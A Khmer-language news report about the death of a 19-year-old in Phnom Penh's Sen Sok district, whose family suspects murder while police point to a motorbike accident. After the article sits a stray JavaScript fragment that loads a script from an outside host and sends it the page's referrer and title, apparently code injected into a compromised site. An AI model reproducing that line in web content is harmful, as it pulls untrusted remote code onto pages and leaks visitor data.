ប្តឹងទៅសមត្ថកិច្ចមូលដ្ឋាន សង្ស័យជាអំពើរឃាតកម្ម ក្រោយកូនស្លាប់ក្នុងស្ថានភាពរបួសធ្ងន់ធ្ងរ

ភ្នំពេញ៖ យុវជនម្នាក់រងរបួសធ្ងន់កាលពីយប់ថ្ងៃទី់១៤ ខែសីហា ២០១៦ ហើយត្រូវបានរថយន្តសង្គ្រោះមន្ទីពេទ្យបង្អែកសែនសុខដឹកទៅសង្គ្រោះនៅមន្ទីពេទ្យរុស្សីតែអកុសលបានដាច់ខ្យល់ស្លាប់ការពីរសៀលថ្ងៃទី១៥សីហា២០១៦ នេះត្រូវបានក្រុមក្រួសារសពប្តឹងសមត្ថកិច្ចមូល ដ្ឋានអោយចុះពិនិត្យដោយមិនអស់ចិត្តនិងការស្លាប់នេះសង្ស័យជាអំពើរឃាតកម្ម។

ករណីនេះបង្ករភ្ញាក់ផ្អើរដល់សមត្ថកិច្ចកាលពីម៉ោង១៦និង០០នាទីល្ងាចថ្ងៃទី១៥សីហា២០១៦នៅសហគមន៍សែនសុខ១ក្រុម៥ផ្លូវលំភូមិសែនសុខ១សង្កាត់ឃ្មួញខណ្ឌសែនសុខ។

សពឈ្មោះ សៅ សុវណ្ណ អាយុ១៩ឆ្នាំមុខរបរសន្តិសុខនៅហ្គ្រេនភ្នំពេញស្នាក់ផ្ទះលេខ១៣៨ផ្លូវលំក្នុងសហគមន៍សែនសុខ១ក្រុម៥ផ្លូវលំភូមិសែនសុខ១សង្កាត់ឃ្មួញខណ្ឌសែនសុខ។

ប្រភពពីសាច់ញាតិសពបានប្រាប់ថានៅល្ងាចមុនកើតហេតុសពខាងលើបានសុំលុយគាត់ចំនួន៥០០០រៀលចាក់សាំងដោយជិះម៉ូតូកុបជ្រុងសេ៥០ពណ៌ឈាមជ្រូកដឹកយុវជនម្នាក់ទៀតមិនដែលស្គាល់ចេញពីផ្ទះដោយប្រាប់ថាទៅចូលរួមកម្មវិធីគេរហូតដល់ម៉ោងរំលងអាធ្រាត្រឈានចូលថ្ងៃ១៥សីហាមានខាងសន្តិសុខនៅហ្គ្រេនបានខលប្រាប់ ថាសពមានគ្រោះថ្នាក់ចរាចរណ៍ត្រូវបានរថយន្តសង្គ្រោះដឹកមកកាន់មន្ទីពេទ្យបង្អែកអន្លង់ក្ងានហើយសុំអោយបងប្អូនទៅមើលផង(ពេទ្យខលប្រាប់សន្តិសុខតាមលេខក្នុងទូរស័ព្ទ)។

ប្រភពដដែលបានប្រាប់ទៀតថាក្រោយពីគាត់ទៅដល់មន្ទីបង្អែកហើយគ្រូពេទ្យបានប្រាប់ថាស្ថានភាពជម្ងឺធ្ងន់ធ្ងរណាស់ត្រូវបញ្ជូបន្តទៅមន្ទីពេទ្យខ្មែរមិត្តភាពសូវៀត(ពេទ្យរុស្សី) ហើយខាងមន្ទីពេទ្យបង្អែកក៍បញ្ជូនទៅកាលពីរំលង អាធ្រាត្យឈានចូលថ្ងៃទី១៥សីហារហូតដល់រសៀលដដែលបានស្លាប់ក្នុងមន្ទីពេទ្យដោយក្រុមក្រួសារមិនអស់ចិត្តក៍រាយការណ៍មកសមត្ថកិច្ចមូលដ្ឋានចុះពិនិត្យទៅលើសពដោយសង្ស័យថាខ្លាចជាករណីឃាតកម្ម(មានគេវាយកូនគាត់)។

តាមសំដីសមត្ថកិច្ចមូលដ្ឋានបានប្រាប់ថាក្រោយពីមានក្រុមគ្រួសារសពប្តឹងពួកគាត់បានរាយការណ៍ទៅថ្នាក់លើនិងបានសហការចុះពិនិត្យទៅលើសពនិងសាកសួរជំវិញកន្លែងកើតហេតុភ្លាមៗដោយសនិដ្ឋានជំហានដំបូងថាករណីដែលឈាដល់ធ្វើអោយយុវជនខាងលើស្លាប់នេះអាចជិះម៉ូតូដួលគ្រោះថ្នាក់រងរបួសធ្ងន់ដោយខ្លួនឯងប៉ុណ្ណោះពីព្រោះក្រោយពីសាកសួរសាក្សីនៅកន្លែងកើតហេតុរួចមក។

គួររំលឹកថាកាលពីម៉ោងប្រហែល២៣និង៣០នាទីគេប្រទេះឃើញយុវជនខាងលើដួលម៉ូតូនៅចំណុចផ្លូវលំភូមិសំរោងទាវសង្កាត់ក្រាំងធ្នង់ខណ្ឌសែនសុខដោយស្ថានភាពសន្លប់ស្តូកស្តឹងកៀនរបងថ្មចំណែកម៉ូតូឃើញដួលលើផ្លូវលំបែកម៉ាសិុនខាងស្តាំផងហើយក៍ទំនាក់ទំនងហៅរថយន្តសង្គ្រោះបង្អែកអន្លង់ក្ងានមកដឹកតែម្តងទៅ។

សមត្ថកិច្ចជំនាញកំពុងធ្វើការពិនិត្យទៅលើសាកសពសពយុវជនខាងលើ។

8067a2b9-cafe-4888-8687-457eba954e02

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More